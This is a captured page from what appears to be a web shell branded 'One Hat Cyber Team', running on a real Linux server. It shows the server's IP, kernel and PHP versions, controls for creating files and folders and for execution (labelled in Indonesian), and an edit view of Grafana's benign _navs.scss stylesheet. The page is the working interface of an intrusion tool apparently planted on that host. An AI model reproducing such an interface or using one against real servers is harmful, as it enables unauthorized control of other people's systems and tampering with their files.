⚝
One Hat Cyber Team
⚝
Your IP:
216.73.217.4
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
grafana
/
public
/
sass
/
components
/
Edit File: _navs.scss
// // Navs // -------------------------------------------------- // BASE CLASS // ---------- .nav { margin: 0; list-style: none; } // Make links block level .nav > li > a { display: block; } // Redeclare pull classes because of specificity .nav > .pull-right { float: right; } // TABS AND PILLS // ------------- // Common styles .nav-tabs { @include clearfix(); } .nav-tabs > li { float: left; } .nav-tabs > li > a { padding-right: 12px; padding-left: 12px; margin-right: 2px; line-height: 14px; // keeps the overall height an even number } // TABS // ---- // Give the tabs something to sit on .nav-tabs { border-bottom: 1px solid $divider-border-color; padding-left: 10px; margin: 0 0 10px 0; } // Make the list-items overlay the bottom border .nav-tabs > li { margin-bottom: -1px; } // Active state, and it's :hover/:focus to override normal :hover/:focus .nav-tabs > .active > a, .nav-tabs > .active > a:hover, .nav-tabs > .active > a:focus { @include border-radius(3px); border-color: $divider-border-color; border-bottom: 1px solid $panel-bg; color: $link-color; } // Show/hide tabbable areas .tab-content > .tab-pane { display: none; } .tab-content > .active { display: block; } // temp hack .modal-body { .nav-tabs { border-bottom: none; } .nav-tabs > li > a { border: none; border-radius: 0; &:hover, &:focus { border-bottom: 1px solid $blue; } } .nav-tabs > .active > a, .nav-tabs > .active > a:hover, .nav-tabs > .active > a:focus { border: none; border-bottom: 1px solid $blue; color: $link-color; } }
Simpan